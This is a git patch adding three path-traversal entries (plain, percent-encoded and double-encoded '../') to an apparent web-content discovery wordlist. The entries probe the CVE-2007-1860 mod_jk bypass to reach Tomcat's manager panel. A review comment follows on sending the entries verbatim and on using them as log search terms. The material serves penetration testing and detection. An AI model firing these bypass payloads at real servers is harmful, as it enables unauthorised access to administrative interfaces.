From fff5faa976521cf396aceb1eb7a8dbe831d3fda2 Mon Sep 17 00:00:00 2001
From: Tiago Sintra
Date: Thu, 28 Jul 2016 14:10:42 +0200
Subject: [PATCH] Support for CVE-2007-1860 mod_jk double encoding

Added paths that will check access control bypass using double encoding (CVE-2007-1860) that could allow a remote user to access Tomcat's administration panel. Based on the scenario demonstrated on https://pentesterlab.com/exercises/cve-2007-1860/course
---
 Discovery/Web_Content/tomcat.txt | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/Discovery/Web_Content/tomcat.txt b/Discovery/Web_Content/tomcat.txt
index 1648921d..8df5eab9 100644
--- a/Discovery/Web_Content/tomcat.txt
+++ b/Discovery/Web_Content/tomcat.txt
@@ -21,6 +21,9 @@ examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp
 examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp
 examples/servlet/snoop
 examples/servlets/index.html
+examples/../manager/html
+examples/%2e%2e/manager/html
+examples/%252e%252e/manager/html
 host-manager
 host-manager/add
 host-manager/host-manager.xml
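Review bot: The three added entries (`examples/../manager/html`, `examples/%2e%2e/manager/html`, `examples/%252e%252e/manager/html`) only test what the commit describes if they reach the server byte-for-byte, and neither the list nor the description says so. Unlike the surrounding plain paths, a client that collapses dot segments or percent-encodes wordlist entries before sending will silently turn them into a different request, so a scan can report a mod_jk front end as unaffected by CVE-2007-1860 when the check never ran as written. The wordlist format has no comment syntax, so I would record the requirement in the commit description or the repository's documentation, for example `Entries containing ../ or %-escapes must be sent verbatim, with client-side path normalisation and URL re-encoding disabled.` The same three strings are also useful search terms for front-end access logs when confirming whether a host was probed for this issue.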